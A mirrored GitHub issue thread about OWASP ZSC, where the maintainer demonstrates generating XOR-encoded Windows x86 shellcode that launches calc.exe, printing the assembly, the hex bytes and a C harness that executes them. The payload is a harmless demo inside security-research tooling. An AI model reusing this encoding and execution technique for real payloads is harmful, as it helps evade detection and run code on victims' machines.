Giter Club home page Giter Club logo

Comments (4)

Ali-Razmjoo avatar Ali-Razmjoo commented on July 22, 2024

Hi,

can you please share the file or the command you used for generating the shellcode?

Regards.

from zsc.

moaeddy avatar moaeddy commented on July 22, 2024

listen.zip

attached is the generated file

from zsc.

moaeddy avatar moaeddy commented on July 22, 2024

Been waiting for your response, can't this be reproduced into .exe?

from zsc.

Ali-Razmjoo avatar Ali-Razmjoo commented on July 22, 2024

Hi, sorry for my late answer, you encoded the file wrong! it has eval(some value) at the end which is not related to .c file or shellcodes.

  • here is a sample command
  ______          __      _____ _____    ______ _____  _____
 / __ \ \        / /\    / ____|  __ \  |___  // ____|/ ____|
| |  | \ \  /\  / /  \  | (___ | |__) |    / /| (___ | |
| |  | |\ \/  \/ / /\ \  \___ \|  ___/    / /  \___ \| |
| |__| | \  /\  / ____ \ ____) | |       / /__ ____) | |____
 \____/   \/  \/_/    \_\_____/|_|      /_____|_____/ \_____|


                OWASP ZeroDay Cyber Research Shellcoder

zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate>
linux_x86      osx_x86        windows_x86    windows_x86_64
zsc/shellcode/generate> w
windows_x86    windows_x86_64
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> exec
zsc/shellcode/generate/windows_x86/exec> file_to_execute
file_to_execute> test/calc.exe

[+] file_to_execute set to "test/calc.exe"

[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue
[+] inc
[+] dec
[+] inc_timesyouwant
[+] dec_timesyouwant
[+] add_yourvalue
[+] sub_yourvalue


[+] enter encode type
zsc/shellcode/generate/windows_x86/exec/encode_type> xo
xor_random    xor_yourvalue
zsc/shellcode/generate/windows_x86/exec/encode_type> xor_random

Output assembly code?(y or n)> y


xor    %ecx,%ecx
mov    %fs:0x30(%ecx),%eax
mov    0xc(%eax),%eax
mov    0x14(%eax),%esi
lods   %ds:(%esi),%eax
xchg   %eax,%esi
lods   %ds:(%esi),%eax
mov    0x10(%eax),%ebx
mov    0x3c(%ebx),%edx
add    %ebx,%edx
mov    0x78(%edx),%edx
add    %ebx,%edx
mov    0x20(%edx),%esi
add    %ebx,%esi
xor    %ecx,%ecx
inc    %ecx
lods   %ds:(%esi),%eax
add    %ebx,%eax
cmpl   $0x50746547,(%eax)
jne    23 <.text+0x23>
cmpl   $0x41636f72,0x4(%eax)
jne    23 <.text+0x23>
cmpl   $0x65726464,0x8(%eax)
jne    23 <.text+0x23>
mov    0x24(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,2),%cx
dec    %ecx
mov    0x1c(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,4),%edx
add    %ebx,%edx
push   %ebx
push   %edx
xor    %ecx,%ecx
push   %ecx
mov    $0x61636578,%ecx
push   %ecx
subl   $0x61,0x3(%esp)

push %ebx
push $0x684b6641
pop %ebx
push $0x2d250f16
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx

push   %esp
push   %ebx
call   *%edx
add    $0x8,%esp
pop    %ecx
push   %eax
xor    %ecx,%ecx
push   %ecx

push %ebx
push $0x346c7a53
pop %ebx
push $0x51fceac3
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx

pop %ecx
shr    $0x10,%ecx
shr    $0x8,%ecx
push %ecx


push %ebx
push $0x64454f35
pop %ebx
push $0x1c206156
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


push %ebx
push $0x71366243
pop %ebx
push $0x1d57016c
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


push %ebx
push $0x634c6159
pop %ebx
push $0x173f042d
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


xor    %ebx,%ebx
mov    %esp,%ebx
xor    %ecx,%ecx
inc    %ecx
push   %ecx
push   %ebx
call   *%eax
add    $0x18,%esp
pop    %edx
pop    %ebx
xor    %ecx,%ecx
mov    $0x61737365,%ecx
push   %ecx
subl   $0x61,0x3(%esp)

push %ebx
push $0x4e525274
pop %ebx
push $0x2d3d2024
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


push %ebx
push $0x42687743
pop %ebx
push $0x36010f06
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx

push   %esp
push   %ebx
call   *%edx
xor    %ecx,%ecx
push   %ecx
call   *%eax


Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0

Shellcode output to a .c file?(y or n)> y
Target .c file?> shellcode.c
[+] File saved as shellcode.c .
zsc> wrong input!
[!] interrupted by user!
Exit

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>type shellcode.c
#include <stdio.h>
#include <string.h>
/*
This shellcode generated by OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
http://zsc.z3r0d4y.com/
owasp-zsc[at]googlegroups[dot]com

Title: exec('test/calc.exe')
OS: windows_x86
Encode: xor_random
Length: 278
Assembly code:


xor    %ecx,%ecx
mov    %fs:0x30(%ecx),%eax
mov    0xc(%eax),%eax
mov    0x14(%eax),%esi
lods   %ds:(%esi),%eax
xchg   %eax,%esi
lods   %ds:(%esi),%eax
mov    0x10(%eax),%ebx
mov    0x3c(%ebx),%edx
add    %ebx,%edx
mov    0x78(%edx),%edx
add    %ebx,%edx
mov    0x20(%edx),%esi
add    %ebx,%esi
xor    %ecx,%ecx
inc    %ecx
lods   %ds:(%esi),%eax
add    %ebx,%eax
cmpl   $0x50746547,(%eax)
jne    23 <.text+0x23>
cmpl   $0x41636f72,0x4(%eax)
jne    23 <.text+0x23>
cmpl   $0x65726464,0x8(%eax)
jne    23 <.text+0x23>
mov    0x24(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,2),%cx
dec    %ecx
mov    0x1c(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,4),%edx
add    %ebx,%edx
push   %ebx
push   %edx
xor    %ecx,%ecx
push   %ecx
mov    $0x61636578,%ecx
push   %ecx
subl   $0x61,0x3(%esp)
push   $0x456e6957
push   %esp
push   %ebx
call   *%edx
add    $0x8,%esp
pop    %ecx
push   %eax
xor    %ecx,%ecx
push   %ecx
push $0x65909090
pop %ecx
shr    $0x10,%ecx
shr    $0x8,%ecx
push %ecx

push $0x78652e63
push $0x6c61632f
push $0x74736574

xor    %ebx,%ebx
mov    %esp,%ebx
xor    %ecx,%ecx
inc    %ecx
push   %ecx
push   %ebx
call   *%eax
add    $0x18,%esp
pop    %edx
pop    %ebx
xor    %ecx,%ecx
mov    $0x61737365,%ecx
push   %ecx
subl   $0x61,0x3(%esp)
push   $0x636f7250
push   $0x74697845
push   %esp
push   %ebx
call   *%edx
xor    %ecx,%ecx
push   %ecx
call   *%eax




compile example(osx_x86): gcc -m32  -o shellcode_compiled shellcode.c
compile example(linux_x86): gcc -m32  -z execstack -o shellcode_compiled shellcode.c
compile example(windows_x86): gcc -o shellcode_compiled.exe shellcode.c
followed by(to run): ./shellcode_compiled or shellcode_compiled.exe
*/



char *shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0";
int main(void)
{
        (*(void(*)()) shellcode)();
        return 0;
}

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>

did you use jsfuck encoding or something by accident? it's not gonna work for "c" language. (check the file you attached at line 113)

from zsc.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.